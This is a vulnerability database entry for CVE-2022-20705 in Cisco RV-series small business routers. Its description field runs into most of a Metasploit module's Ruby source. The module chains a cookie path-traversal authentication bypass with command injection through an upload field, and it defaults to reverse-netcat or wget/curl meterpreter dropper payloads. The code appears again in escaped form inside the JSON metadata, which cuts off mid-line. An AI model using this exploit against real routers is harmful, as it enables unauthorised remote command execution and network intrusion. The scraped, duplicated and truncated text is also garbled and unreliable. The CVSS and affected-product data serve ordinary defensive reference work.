var-202202-0325
Vulnerability from variot

Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory. plural Cisco Small Business RV series router Exists in an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of Cisco RV340 routers. Authentication is not required to exploit this vulnerability.The specific flaw exists within the configuration of the NGINX web server. When parsing the sessionid cookie, the process does not properly validate a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to bypass authentication on the system. This access can then be used to pivot to other parts of the network. This module works on firmware versions 1.0.03.24 and below. }, 'License' => MSF_LICENSE, 'Platform' => ['linux', 'unix'], 'Author' => [ 'Biem Pham', # Vulnerability Discoveries 'Neterum', # Metasploit Module 'jbaines-r7' # Inspired from cisco_rv_series_authbypass_and_rce.rb ], 'DisclosureDate' => '2021-11-02', 'Arch' => [ARCH_CMD, ARCH_ARMLE], 'References' => [ ['CVE', '2022-20705'], # Authentication Bypass ['CVE', '2022-20707'], # Command Injection ['ZDI', '22-410'], # Authentication Bypass ['ZDI', '22-411'] # Command Injection ], 'Targets' => [ [ 'Unix Command', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_cmd, 'Payload' => { 'BadChars' => '\'#' }, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat' } } ], [ 'Linux Dropper', { 'Platform' => 'linux', 'Arch' => [ARCH_ARMLE], 'Type' => :linux_dropper, 'Payload' => { 'BadChars' => '\'#' }, 'CmdStagerFlavor' => [ 'wget', 'curl' ], 'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp' } } ] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true, 'MeterpreterTryToFork' => true }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } ) ) register_options( [ OptString.new('TARGETURI', [true, 'Base path', '/']) ] ) end

# sessionid utilized later needs to be set to length # of 16 or exploit will fail. Tested with lengths # 14-17 def generate_session_id return Rex::Text.rand_text_alphanumeric(16) end

def check res = send_request_cgi({ 'method' => 'GET', 'uri' => '/upload', 'headers' => { 'Cookie' => 'sessionid =../../www/index.html; sessionid=' + generate_session_id } }, 10)

# A proper "upload" will trigger file creation. So the send_request_cgi call
# above is an incorrect "upload" call to avoid creating a file on disk. The router will return
# status code 405 Not Allowed if authentication has been bypassed by the above request. 
# The firmware containing this authentication bypass also contains the command injection
# vulnerability that will be abused during actual exploitation. Non-vulnerable
# firmware versions will respond with 403 Forbidden. 
if res.nil?
  return CheckCode::Unknown('The device did not respond to request packet.')
elsif res.code == 405
  return CheckCode::Appears('The device is vulnerable to authentication bypass. Likely also vulnerable to command injection.')
elsif res.code == 403
  return CheckCode::Safe('The device is not vulnerable to exploitation.')
else # Catch-all
  return CheckCode::Unknown('The target responded in an unexpected way. Exploitation is unlikely.')
end

end

def execute_command(cmd, _opts = {}) res = send_exploit(cmd)

# Successful unix_cmd shells should not produce a response. 
# However if a response is returned, check the status code and return
# Failure::NotVulnerable if it is 403 Forbidden. 
if target['Type'] == :unix_cmd && res&.code == 403
  fail_with(Failure::NotVulnerable, 'The target responded with 403 Forbidden and is not vulnerable')
end

if target['Type'] == :linux_dropper
  fail_with(Failure::Unreachable, 'The target did not respond') unless res
  fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200
  begin
    body_json = res.get_json_document
    fail_with(Failure::UnexpectedReply, 'The target did not respond with a JSON body') unless body_json
  rescue JSON::ParserError => e
    print_error("Failed: #{e.class} - #{e.message}")
    fail_with(Failure::UnexpectedReply, 'Failed to parse the response returned from the server! Its possible the response may not be JSON!')
  end
end

print_good('Exploit successfully executed.')

end

def send_exploit(cmd) filename = Rex::Text.rand_text_alphanumeric(5..12) fileparam = Rex::Text.rand_text_alphanumeric(5..12) input = Rex::Text.rand_text_alphanumeric(5..12)

# sessionid utilized later needs to be set to length
# of 16 or exploit will fail. Tested with lengths
# 14-17
sessionid = Rex::Text.rand_text_alphanumeric(16)

filepath = '/tmp/upload.input' # This file must exist and be writeable by www-data so we just use the temporary upload file to prevent issues. 
pathparam = 'Configuration'

destination = "'; " + cmd + ' #'

multipart_form = Rex::MIME::Message.new
multipart_form.add_part(filepath, nil, nil, 'form-data; name="file.path"')
multipart_form.add_part(filename, nil, nil, 'form-data; name="filename"')
multipart_form.add_part(pathparam, nil, nil, 'form-data; name="pathparam"')
multipart_form.add_part(fileparam, nil, nil, 'form-data; name="fileparam"')
multipart_form.add_part(destination, nil, nil, 'form-data; name="destination"')
multipart_form.add_part(input, 'application/octet-stream', nil, format('form-data; name="input"; filename="%<filename>s"', filename: filename))

# Escaping "/tmp/upload/" folder that does not contain any other permanent files
send_request_cgi({
  'method' => 'POST',
  'uri' => '/upload',
  'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}",
  'headers' => {
    'Cookie' => 'sessionid =../../www/index.html; sessionid=' + sessionid
  },
  'data' => multipart_form.to_s
}, 10)

end

def exploit print_status("Executing #{target.name} for #{datastore['PAYLOAD']}") case target['Type'] when :unix_cmd execute_command(payload.encoded) when :linux_dropper execute_cmdstager(linemax: 120) end end end

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202202-0325",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "rv340",
        "scope": null,
        "trust": 2.1,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "rv340w",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "1.0.03.24"
      },
      {
        "model": "rv340",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "1.0.03.24"
      },
      {
        "model": "rv345p",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "1.0.03.24"
      },
      {
        "model": "rv260p",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "1.0.01.05"
      },
      {
        "model": "rv160",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "1.0.01.05"
      },
      {
        "model": "rv345",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "1.0.03.24"
      },
      {
        "model": "rv260",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "1.0.01.05"
      },
      {
        "model": "rv160w",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "1.0.01.05"
      },
      {
        "model": "rv260w",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "1.0.01.05"
      },
      {
        "model": "rv160 vpn router",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
        "version": null
      },
      {
        "model": "rv260w wireless-ac vpn router",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
        "version": null
      },
      {
        "model": "rv160w wireless-ac vpn router",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
        "version": null
      },
      {
        "model": "rv345p dual wan gigabit poe vpn router",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
        "version": null
      },
      {
        "model": "rv260p vpn router with poe",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
        "version": null
      },
      {
        "model": "rv260 vpn router",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
        "version": null
      },
      {
        "model": "rv345 dual wan gigabit vpn router",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
        "version": null
      },
      {
        "model": "rv340 dual wan gigabit vpn router",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
        "version": null
      },
      {
        "model": "rv340w dual wan gigabit wireless-ac vpn router",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "ZDI",
        "id": "ZDI-22-415"
      },
      {
        "db": "ZDI",
        "id": "ZDI-22-410"
      },
      {
        "db": "ZDI",
        "id": "ZDI-22-409"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-004459"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-20705"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:rv340_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "1.0.03.24",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:rv340:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:rv340w_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "1.0.03.24",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:rv340w:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:rv345_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "1.0.03.24",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:rv345:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:rv345p_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "1.0.03.24",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:rv345p:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:rv160_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "1.0.01.05",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:rv160:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:rv160w_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "1.0.01.05",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:rv160w:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:rv260_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "1.0.01.05",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:rv260:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:rv260p_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "1.0.01.05",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:rv260p:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:rv260w_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "1.0.01.05",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:rv260w:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2022-20705"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Bien Pham (@bienpnn) from Team Orca of Sea Security (security.sea.com)",
    "sources": [
      {
        "db": "ZDI",
        "id": "ZDI-22-410"
      },
      {
        "db": "ZDI",
        "id": "ZDI-22-409"
      }
    ],
    "trust": 1.4
  },
  "cve": "CVE-2022-20705",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 7.5,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2022-20705",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "ADJACENT",
            "author": "ZDI",
            "availabilityImpact": "HIGH",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 2.8,
            "id": "CVE-2022-20705",
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.4,
            "userInteraction": "NONE",
            "vectorString": "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "ykramarz@cisco.com",
            "availabilityImpact": "HIGH",
            "baseScore": 10.0,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "impactScore": 6.0,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 9.8,
            "baseSeverity": "Critical",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2022-20705",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          {
            "attackComplexity": "LOW",
            "attackVector": "ADJACENT",
            "author": "ZDI",
            "availabilityImpact": "NONE",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 2.8,
            "id": "CVE-2022-20705",
            "impactScore": 3.6,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 0.7,
            "userInteraction": "NONE",
            "vectorString": "AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2022-20705",
            "trust": 1.8,
            "value": "CRITICAL"
          },
          {
            "author": "ZDI",
            "id": "CVE-2022-20705",
            "trust": 1.4,
            "value": "HIGH"
          },
          {
            "author": "ykramarz@cisco.com",
            "id": "CVE-2022-20705",
            "trust": 1.0,
            "value": "CRITICAL"
          },
          {
            "author": "ZDI",
            "id": "CVE-2022-20705",
            "trust": 0.7,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202202-166",
            "trust": 0.6,
            "value": "CRITICAL"
          },
          {
            "author": "VULMON",
            "id": "CVE-2022-20705",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "ZDI",
        "id": "ZDI-22-415"
      },
      {
        "db": "ZDI",
        "id": "ZDI-22-410"
      },
      {
        "db": "ZDI",
        "id": "ZDI-22-409"
      },
      {
        "db": "VULMON",
        "id": "CVE-2022-20705"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-004459"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202202-166"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-20705"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-20705"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory. plural Cisco Small Business RV series router Exists in an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of Cisco RV340 routers. Authentication is not required to exploit this vulnerability.The specific flaw exists within the configuration of the NGINX web server. When parsing the sessionid cookie, the process does not properly validate a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to bypass authentication on the system. \n          This access can then be used to pivot to other parts of the network. This module works on firmware\n          versions 1.0.03.24 and below. \n        },\n        \u0027License\u0027 =\u003e MSF_LICENSE,\n        \u0027Platform\u0027 =\u003e [\u0027linux\u0027, \u0027unix\u0027],\n        \u0027Author\u0027 =\u003e [\n          \u0027Biem Pham\u0027,  # Vulnerability Discoveries\n          \u0027Neterum\u0027,    # Metasploit Module\n          \u0027jbaines-r7\u0027  # Inspired from cisco_rv_series_authbypass_and_rce.rb\n        ],\n        \u0027DisclosureDate\u0027 =\u003e \u00272021-11-02\u0027,\n        \u0027Arch\u0027 =\u003e [ARCH_CMD, ARCH_ARMLE],\n        \u0027References\u0027 =\u003e [\n          [\u0027CVE\u0027, \u00272022-20705\u0027], # Authentication Bypass\n          [\u0027CVE\u0027, \u00272022-20707\u0027], # Command Injection\n          [\u0027ZDI\u0027, \u002722-410\u0027], # Authentication Bypass\n          [\u0027ZDI\u0027, \u002722-411\u0027]  # Command Injection\n        ],\n        \u0027Targets\u0027 =\u003e [\n          [\n            \u0027Unix Command\u0027,\n            {\n              \u0027Platform\u0027 =\u003e \u0027unix\u0027,\n              \u0027Arch\u0027 =\u003e ARCH_CMD,\n              \u0027Type\u0027 =\u003e :unix_cmd,\n              \u0027Payload\u0027 =\u003e {\n                \u0027BadChars\u0027 =\u003e \u0027\\\u0027#\u0027\n              },\n              \u0027DefaultOptions\u0027 =\u003e {\n                \u0027PAYLOAD\u0027 =\u003e \u0027cmd/unix/reverse_netcat\u0027\n              }\n            }\n          ],\n          [\n            \u0027Linux Dropper\u0027,\n            {\n              \u0027Platform\u0027 =\u003e \u0027linux\u0027,\n              \u0027Arch\u0027 =\u003e [ARCH_ARMLE],\n              \u0027Type\u0027 =\u003e :linux_dropper,\n              \u0027Payload\u0027 =\u003e {\n                \u0027BadChars\u0027 =\u003e \u0027\\\u0027#\u0027\n              },\n              \u0027CmdStagerFlavor\u0027 =\u003e [ \u0027wget\u0027, \u0027curl\u0027 ],\n              \u0027DefaultOptions\u0027 =\u003e {\n                \u0027PAYLOAD\u0027 =\u003e \u0027linux/armle/meterpreter/reverse_tcp\u0027\n              }\n            }\n          ]\n        ],\n        \u0027DefaultTarget\u0027 =\u003e 0,\n        \u0027DefaultOptions\u0027 =\u003e {\n          \u0027RPORT\u0027 =\u003e 443,\n          \u0027SSL\u0027 =\u003e true,\n          \u0027MeterpreterTryToFork\u0027 =\u003e true\n        },\n        \u0027Notes\u0027 =\u003e {\n          \u0027Stability\u0027 =\u003e [CRASH_SAFE],\n          \u0027Reliability\u0027 =\u003e [REPEATABLE_SESSION],\n          \u0027SideEffects\u0027 =\u003e [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n        }\n      )\n    )\n    register_options(\n      [\n        OptString.new(\u0027TARGETURI\u0027, [true, \u0027Base path\u0027, \u0027/\u0027])\n      ]\n    )\n  end\n\n  # sessionid utilized later needs to be set to length\n  # of 16 or exploit will fail. Tested with lengths\n  # 14-17\n  def generate_session_id\n    return Rex::Text.rand_text_alphanumeric(16)\n  end\n\n  def check\n    res = send_request_cgi({\n      \u0027method\u0027 =\u003e \u0027GET\u0027,\n      \u0027uri\u0027 =\u003e \u0027/upload\u0027,\n      \u0027headers\u0027 =\u003e {\n        \u0027Cookie\u0027 =\u003e \u0027sessionid =../../www/index.html; sessionid=\u0027 + generate_session_id\n      }\n    }, 10)\n\n    # A proper \"upload\" will trigger file creation. So the send_request_cgi call\n    # above is an incorrect \"upload\" call to avoid creating a file on disk. The router will return\n    # status code 405 Not Allowed if authentication has been bypassed by the above request. \n    # The firmware containing this authentication bypass also contains the command injection\n    # vulnerability that will be abused during actual exploitation. Non-vulnerable\n    # firmware versions will respond with 403 Forbidden. \n    if res.nil?\n      return CheckCode::Unknown(\u0027The device did not respond to request packet.\u0027)\n    elsif res.code == 405\n      return CheckCode::Appears(\u0027The device is vulnerable to authentication bypass. Likely also vulnerable to command injection.\u0027)\n    elsif res.code == 403\n      return CheckCode::Safe(\u0027The device is not vulnerable to exploitation.\u0027)\n    else # Catch-all\n      return CheckCode::Unknown(\u0027The target responded in an unexpected way. Exploitation is unlikely.\u0027)\n    end\n  end\n\n  def execute_command(cmd, _opts = {})\n    res = send_exploit(cmd)\n\n    # Successful unix_cmd shells should not produce a response. \n    # However if a response is returned, check the status code and return\n    # Failure::NotVulnerable if it is 403 Forbidden. \n    if target[\u0027Type\u0027] == :unix_cmd \u0026\u0026 res\u0026.code == 403\n      fail_with(Failure::NotVulnerable, \u0027The target responded with 403 Forbidden and is not vulnerable\u0027)\n    end\n\n    if target[\u0027Type\u0027] == :linux_dropper\n      fail_with(Failure::Unreachable, \u0027The target did not respond\u0027) unless res\n      fail_with(Failure::UnexpectedReply, \u0027The target did not respond with a 200 OK\u0027) unless res\u0026.code == 200\n      begin\n        body_json = res.get_json_document\n        fail_with(Failure::UnexpectedReply, \u0027The target did not respond with a JSON body\u0027) unless body_json\n      rescue JSON::ParserError =\u003e e\n        print_error(\"Failed: #{e.class} - #{e.message}\")\n        fail_with(Failure::UnexpectedReply, \u0027Failed to parse the response returned from the server! Its possible the response may not be JSON!\u0027)\n      end\n    end\n\n    print_good(\u0027Exploit successfully executed.\u0027)\n  end\n\n  def send_exploit(cmd)\n    filename = Rex::Text.rand_text_alphanumeric(5..12)\n    fileparam = Rex::Text.rand_text_alphanumeric(5..12)\n    input = Rex::Text.rand_text_alphanumeric(5..12)\n\n    # sessionid utilized later needs to be set to length\n    # of 16 or exploit will fail. Tested with lengths\n    # 14-17\n    sessionid = Rex::Text.rand_text_alphanumeric(16)\n\n    filepath = \u0027/tmp/upload.input\u0027 # This file must exist and be writeable by www-data 